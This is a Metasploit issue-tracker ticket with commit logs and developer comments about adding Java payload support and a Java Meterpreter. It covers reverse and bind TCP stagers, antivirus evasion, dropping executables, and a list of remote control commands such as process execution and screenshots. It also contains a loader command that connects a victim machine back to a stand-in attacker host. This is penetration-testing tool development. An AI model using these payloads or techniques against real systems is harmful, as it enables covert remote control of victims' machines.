Feature #406
Full Java Payload Support
| Status: | New | Start date: | 11/10/2009 | ||
|---|---|---|---|---|---|
| Priority: | Normal | Due date: | |||
| Assignee: | Stephen Fewer | % Done: | 30% |
||
| Category: | general | ||||
| Target version: | Open Backlog | ||||
| Resolution: | How To Use: | ||||
| Release Note: |
Description
Complete support for Java payloads, including JSP and EJB/WAR support, a custom class loader stager (reverse_tcp and bind_tcp) and .class stages. At a minimum include shell and upexec and ideally an upexec_native_meterpreter.
Related issues
Associated revisions
add java meterpreter and update java_calendar_deserialize to be able to use it, see #406
git-svn-id: file:///home/svn/framework3/trunk@9874 4d416f70-5f16-0410-b530-b9f4589650da
add preliminary support for the new java payloads. Working meterpreter and shell stages with tcp bind and reverse stagers, see #406
git-svn-id: file:///home/svn/framework3/trunk@10073 4d416f70-5f16-0410-b530-b9f4589650da
and the bins. see #406
git-svn-id: file:///home/svn/framework3/trunk@10074 4d416f70-5f16-0410-b530-b9f4589650da
add source code for javapayload, thanks mihi. see #406
git-svn-id: file:///home/svn/framework3/trunk@10075 4d416f70-5f16-0410-b530-b9f4589650da
add source for java meterpreter. see #406
git-svn-id: file:///home/svn/framework3/trunk@10294 4d416f70-5f16-0410-b530-b9f4589650da
update to java meterpreter, now supports file search, thanks mihi! see #406
git-svn-id: file:///home/svn/framework3/trunk@10295 4d416f70-5f16-0410-b530-b9f4589650da
add ability to drop an executable from the jar. see #406, thanks mihi
git-svn-id: file:///home/svn/framework3/trunk@10973 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Michael Schierl about 2 years ago
This might save you some work: http://schierlm.users.sourceforge.net/JavaPayload/
Updated by David Rude about 2 years ago
msfpayload supports WAR creation for payloads. I haven't looked into the EJB fileformat yet I assume its similar.
Updated by Michael Schierl about 2 years ago
Just for the record: The link above is not primarily about taking a native payload and wrapping it into some kind of Java container. Pure Java payloads are not as good as meterpreter on windows (yet...), but still a lot better than other payloads on other platforms... :-)
Of course, if you think the only real payloads are native payloads and people who do not like fiddling with asm are not real men, you can still find some inspiration there about how to get a Java class (with some native payload embedded) onto another machine or into another process (Anyone wanting to reimplement JDWP or JAttach in Ruby?). (If anyone had an exploit to use Microsoft's Remote Debugging via DCOM to inject a native payload into a remote process, it would be cool, too. Although JDWP ports tend to be open more often than remote debugging, and by default they do not require authentication.)
Updated by James Lee over 1 year ago
- Target version changed from Metasploit 3.4.0 to Metasploit 3.4.1
Updated by James Lee over 1 year ago
- Target version changed from Metasploit 3.4.1 to Metasploit 3.5.0
Michael: If you want to pick up the torch and build a java meterpreter, I'm all for it. =)
At a minimum, java payloads need to be able to start a new java instance for getting out of applet context so closing a browser / navigating away doesn't kill your shell. I'd love to see Java as a first-class citizen. Again, a native meterpreter will probably be better in most cases, though, so I agree with Stephen that we need some way to go from javaterpreter to native meterpreter.
Updated by Michael Schierl over 1 year ago
Yeah, I'll surely like to build the java part of a Meterpreter.
On the other hand, I'm currently lacking both time and motivation for learning "yet another scripting language" (Ruby). So, in the not so distant future, I won't help you with building the framework stuff needed to make Java a first-class citizen in your payload ecosystem - like msfpayload support to build "executable" payloads (either .class or .jar), msfencode for encoding them for IDS/AV evasion, or dynamically combining stagers and stages into an exploit.
For my Java Payloads, I use bytecode manipulation to change the contents of Java class files and for combining them with exploits where needed (i. e. where the exploit cannot just link against the stager/stage classes). Metasploit will most likely handle Java like any other language, i. e. do modifications using string manipulation on the source code and then dynamically compile the result.
But, I will try to find time for building a drop-in replacement for the C or PHP meterpreter in Java (i. e. run multi/handler with php/meterpreter/reverse_tcp and have my Java process to connect instead). Some parts like dynamically loading modules will still have to be changed later, but it should be a good start (if I get it working). Don't nail me for a completion date, though - it's still a "just for fun" project for me.
Is there any documentation about how the on-the-wire protocol of Meterpreter is designed, and about how migration is implemented, or should I try to reverse engineer the PHP version? If migration works by duplicating socket handles into another process, migration will not be possible in Java (without native code). If however, migration works by dropping the socket connection and reestablishing it quickly afterwards, it will be possible to migrate (at least as long as no other channels are open) into any other Java process running under the same JVM and credentials, if the JVM version is 1.6 or above, using Java Attach API. And you can always "migrate" into a fresh process.
For java payloads spawning extra instances (before the stage is loaded), it is useful that Apache Ant's fork function implements all the ugly platform-specific details in a way that can be easily reused. How this can be used with my existing payloads: http://schierlm.users.sourceforge.net/SpawnJavaPayload/ (will drop a file to disk).
"Upgrading" a Java meterpreter to native should always be possible by dropping an executable and optionally tunnelling the TCP connection for controlling it via the Java meterpreter (or using a native meterpreter that communicates with stdin/stdout). Other alternatives would require JNI libraries, either custom built ones (which will soon be flagged by antivirus), or generic ones like NativeCall or JNA that at least support allocating RWX memory and calling CreateThread. JNI libraries will avoid having the native meterpreter be written to disk, but the JNI library itself will still be written to disk before loading. This is all about Microsoft Windows, unfortunately I don't have any experience with JNI on other platforms.
Other ideas are welcome too, of course.
Updated by Michael Schierl over 1 year ago
- File JavaMeterpreter.zip added
Attached is my attempt at building a Java meterpreter. It supports the commands supported
by the PHP meterpreter and additionally the ipconfig, route and screenshot commands. All without
a native line of code. Minimum Java version is 1.2, but some commands require 1.3, 1.4 or 1.6.
List of all supported methods (depending on Java version):
mgr.registerCommand("core_channel_close", core_channel_close.class);
mgr.registerCommand("core_channel_eof", core_channel_eof.class);
mgr.registerCommand("core_channel_interact", core_channel_interact.class);
mgr.registerCommand("core_channel_open", core_channel_open.class);
mgr.registerCommand("core_channel_read", core_channel_read.class);
mgr.registerCommand("core_channel_write", core_channel_write.class);
mgr.registerCommand("core_loadlib", core_loadlib.class);
mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
mgr.registerCommand("stdapi_fs_chdir", stdapi_fs_chdir.class);
mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path.class); // %COMSPEC% only
mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
mgr.registerCommand("stdapi_fs_stat", stdapi_fs_stat.class, V1_2, V1_6);
mgr.registerCommand("stdapi_net_config_get_interfaces", stdapi_net_config_get_interfaces.class, V1_4, V1_6);
mgr.registerCommand("stdapi_net_config_get_routes", stdapi_net_config_get_routes.class, V1_4);
mgr.registerCommand("stdapi_net_socket_tcp_shutdown", stdapi_net_socket_tcp_shutdown.class, V1_2, V1_3);
mgr.registerCommand("stdapi_sys_config_getuid", stdapi_sys_config_getuid.class);
mgr.registerCommand("stdapi_sys_config_sysinfo", stdapi_sys_config_sysinfo.class);
mgr.registerCommand("stdapi_sys_process_execute", stdapi_sys_process_execute.class, V1_2, V1_3);
mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class, V1_4);
It can be either loaded standalone on the victim's machine (java -jar loader.jar attacker.example.com 4444) or can be used
with a JavaPayload (by the use of a proxy process written in Java running on the attacker's machine).
Besides from upgrading to a native meterpreter, what else is missing?
Updated by James Lee over 1 year ago
a big one is channel_create_stdapi_net_udp_client (which is also missing from PHP right now).
Updated by Michael Schierl over 1 year ago
- File JavaMeterpreter.zip added
Okay, new version of java meterpreter.
Fixed the classloader bug in the previous one we discussed about in IRC, and changed expand path to use $SHELL for COMSPEC on unix when Java is 1.5 or above (so we can read environment variables).
Also added channel_create_stdapi_net_tcp_server (tested with pivoting another java meterpreter), and channel_create_stdapi_net_udp_client (tested with scanner/discovery/udp_probe). What I could not test is the feature to create the udp socket unconnected and submit a peer host/port on the individual write requests, because I could not find a module using it (it should work though). When an UDP read returns an ICMP error (like port unreachable), it is silently discarded.
Updated by James Lee over 1 year ago
- % Done changed from 0 to 30
Michael: Thanks for your contribution! It's mostly integrated (and works with java_calendar_deserialize) now. One thing I need to take a look at is how you embed parameters into the loader so we can do it in ruby to avoid the requirement of a JRE on the attacker's machine.
Updated by Michael Schierl over 1 year ago
- File JavaPayload4Meterpreter.zip added
As discussed yesterday with James Lee on IRC, here is a special java payload version for Metasploit: One single Payload class that can do bind/reverse tcp and load stage classes over the network, based on a text file (Property file) inside the jar. I also added a bunch of stage classes (including Shell, UpExec and Meterpreter) that should be easily callable from Ruby.
Updated by Michael Schierl over 1 year ago
- File JavaMeterpreter.zip added
New version of Java meterpreter:
- Added support for stdapi_fs_search
- Removed the old loader.jar and JavaPayloadProxy.jar, as they are no longer needed
- Removed the old metasploit patch file and documentation, as it has been applied
- Update the debug loader so that it works with the current payload staging scheme
(it will ignore the uploaded classes and jars, though).
As it seems you don't keep the source code in SVN, the only file to update is ext_server_stdapi.jar
Updated by James Lee over 1 year ago
We do keep the source in svn under external/source/javapayload
Updated by James Lee over 1 year ago
I was mistaken, the meterpreter source was not in svn. An oversight corrected by r10294
Updated by Michael Schierl over 1 year ago
- File javasource.txt added
An ASCII85 encoded version of Payload.class plus some Java code for decoding and loading it, all in a single method (method header not included). Might come useful as a drop-in replacement for running Java meterpreter instead of some hard-coded Java code, for example in auxiliary/admin/oracle/post_exploitation/*.rb (or for the jsp wars, or any other place you can find when grepping for "Runtime.getRuntime" or "FileOutputStream", which is part of almost every "inline" Java code I found in Metasploit), especially when there is no jar file to load the class and the configuration file from.
As you might have guessed, the first line contains the "configuration file" as a String.
This version supports all the stuff supported by the "binary" version (including Spawn), and has been tested with JRE 1.2+.
Feel free to use or not to use as you like.
Updated by Michael Schierl over 1 year ago
- File javasource.zip added
source code and build script for javasource.txt
Updated by James Lee over 1 year ago
It's possible that I'm reading your documentation wrong, but I don't see a way to run an executable embedded in the jar file. Having that ability would give us a generic way to wrap native executables in java and allow for a simple way to use both java and native payloads in the same way.
Updated by Michael Schierl over 1 year ago
- File drop-executable.patch added
You are right, executables can be only uploaded, not embedded.
But this can be changed easily, a patch is attached.
Tested only on Windows, though (i. e. the setExecutable() code is untested), as I don't have access to other OSes at the moment.
Updated by James Lee about 1 year ago
- Target version changed from Metasploit 3.5.0 to Metasploit 3.6